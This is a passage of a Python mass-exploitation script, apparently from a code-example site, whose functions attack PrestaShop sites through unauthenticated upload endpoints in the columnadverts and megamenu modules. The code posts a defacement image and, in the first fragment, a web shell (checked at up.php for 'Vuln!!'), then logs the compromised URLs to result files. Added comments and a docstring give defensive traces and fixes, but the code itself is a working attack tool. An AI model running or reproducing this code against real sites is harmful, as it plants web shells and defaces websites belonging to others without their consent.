            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    # Only the path is written here, without the host name,
                    # unlike the script entry below.
                    writer.write(IndexPath + '\n')
                requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
                ShellPath = '/modules/columnadverts/slides/up.php'
                CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
                if 'Vuln!!' in str(CheckShell.content):
                    with open('result/Shell_results.txt', 'a') as writer:
                        writer.write(site + ShellPath + '\n')
                # Reported as a hit even when only the image upload was confirmed.
                return printModule.returnYes(site, 'N/A', 'Columnadverts Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
예제 #30
def Exploit(site):
    """Test the uploadify script bundled with the Prestashop megamenu module.

    Requests ``/modules/megamenu/uploadify/uploadify.php?id=pwn`` on ``site``;
    on HTTP 200 it posts a local image as multipart field ``Filedata`` and then
    looks for the file directly under the site root. A confirmed upload is
    appended to ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the upload script is reached with no credentials visible
    in this function, and the check location implies the file lands in the
    document root. Multipart POSTs to ``uploadify.php`` and unknown files at
    the top of the web root are the traces. Updating the module or removing the
    bundled ``uploadify/`` directory closes the path.
    """
    try:
        Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
        Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers)
        # Opened before the status check; a missing local file ends in "no".
        FileDataIndex = {'Filedata': open(Jce_Deface_image, 'rb')}
        if Checkvuln.status_code == 200:
            requests.post('http://' + Exp,
                          files=FileDataIndex,
                          timeout=10,
                          headers=Headers)
            # The file is expected at the site root, not inside the module directory.
            IndexPath = site + '/' + Jce_Deface_image.split('/')[1]
            CheckIndex = requests.get('http://' + IndexPath,
                                      timeout=10,
                                      headers=Headers)
            # The GIF89a signature in the fetched body is the proof of a stored upload.
            if 'GIF89a' in CheckIndex.content:
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                return printModule.returnYes(site, 'N/A', 'megamenu Module',
                                             'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'megamenu Module',
                                            'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'megamenu Module',
                                        'Prestashop')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'megamenu Module',
                                    'Prestashop')